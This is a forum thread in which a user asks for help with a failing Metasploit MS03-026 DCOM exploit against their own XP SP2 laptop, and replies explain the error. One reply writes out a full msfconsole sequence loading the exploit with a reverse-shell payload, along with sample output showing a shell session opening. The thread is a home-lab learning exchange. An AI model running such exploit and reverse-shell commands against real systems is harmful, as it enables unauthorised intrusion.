help with metaspoilt

Viewing 5 reply threads
  • Author
    Posts
    • #2635
      cripton
      Participant

      Hello ..
                      i have connected my laptop with pc and tryin out using exploits …
      when i execute an exploit i get an error          :-  “Exploit failed: Invalid
      packet. Packet header must be at least 10 bytes long”

      can any one tell me how to change the size of the header???

    • #18871
      apollo
      Participant

      I’m not sure that it’s the size of your header that is the problem.  I’d be interested more in what you are trying to do when you get this error message.  Looking up that error message, it seems to be from the dcerpc package, so I’m guessing that it might be the dcom exploit but if you can tell us the commands that you ran within metasploit to get the error, then we can maybe help you troubleshoot the problem better.

    • #18872
      Anonymous
      Participant

      to echo apollo

      what commands and options did you run?

      what OS are you running?

      what OS and SP is your target?

      did you select the appropriate target inside of MSF?

    • #18873
      cripton
      Participant

      @apollo wrote:

      I’m not sure that it’s the size of your header that is the problem.  I’d be interested more in what you are trying to do when you get this error message.  Looking up that error message, it seems to be from the dcerpc package, so I’m guessing that it might be the dcom exploit but if you can tell us the commands that you ran within metasploit to get the error, then we can maybe help you troubleshoot the problem better.

      Well i m using a GUI metasploit in which :

      1. selected exploit/windows/dcerpc/ms03_026_dcom
      2.  Target is my laptop which has xp sp 2
      3.  payload used is Windows/shell_reverse_tcp
      4.  rhost is set to laptop IP

      after i apply the exploit i m getting:-

      22:07:55 – ms03_026_dcom [*] Launching exploit windows/dcerpc/ms03_026_dcom…
      22:07:56 – ms03_026_dcom [*] Started reverse handler
      22:07:56 – ms03_026_dcom [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal…
      22:07:56 – ms03_026_dcom [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.2.1[135] …
      22:07:56 – ms03_026_dcom [-] Exploit failed: Invalid packet. Packet header must be at least 10 bytes long

      My pc has xp sp 2.. 

    • #18874
      apollo
      Participant

      I’m guessing that the host may not be vulnerable and that the reaction based off of the data received from the host you were trying to exploit is what is getting reported on based on the fact that the code which produces that error lives in both the client and the listener for the dcerpc stuff.  You may want to try the console though in case there is something else amiss.  Try this:
      Everywhere that is is the host running metasploit
      Everywhere that is is the host that you want to exploit


      msfconsole

      then

      msf > use exploit/windows/dcerpc/ms03_026_dcom
      msf exploit(ms03_026_dcom) > set target 0
      target => 0
      msf exploit(ms03_026_dcom) > set payload windows/shell_reverse_tcp
      payload => windows/shell_reverse_tcp
      msf exploit(ms03_026_dcom) > set lhost
      lhost =>
      msf exploit(ms03_026_dcom) > set rhost
      rhost =>
      msf exploit(ms03_026_dcom) > exploit
      [*] Started reverse handler
      [*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
      [*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:[135] ...
      [*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:[135] ...
      [*] Sending exploit ...
      [*] The DCERPC service did not reply to our request
      [*] Command shell session 1 opened (:4444 -> :1095)
      msf exploit(ms03_026_dcom) >

      That should work if the host is vulnerable, you may have to try a few times, sometimes certain exploits don’t work 100% of the time, and sometimes they partially work. 

    • #18875
      Kev
      Participant

      ms03_026_dcom on XP sp2 ?  Its not vulnerable.

Viewing 5 reply threads
  • You must be logged in to reply to this topic.

Copyright ©2021 Caendra, Inc.

Contact Us

Thoughts, suggestions, issues? Send us an email, and we'll get back to you.

Sending

Sign in with Caendra

Forgot password?Sign up

Forgot your details?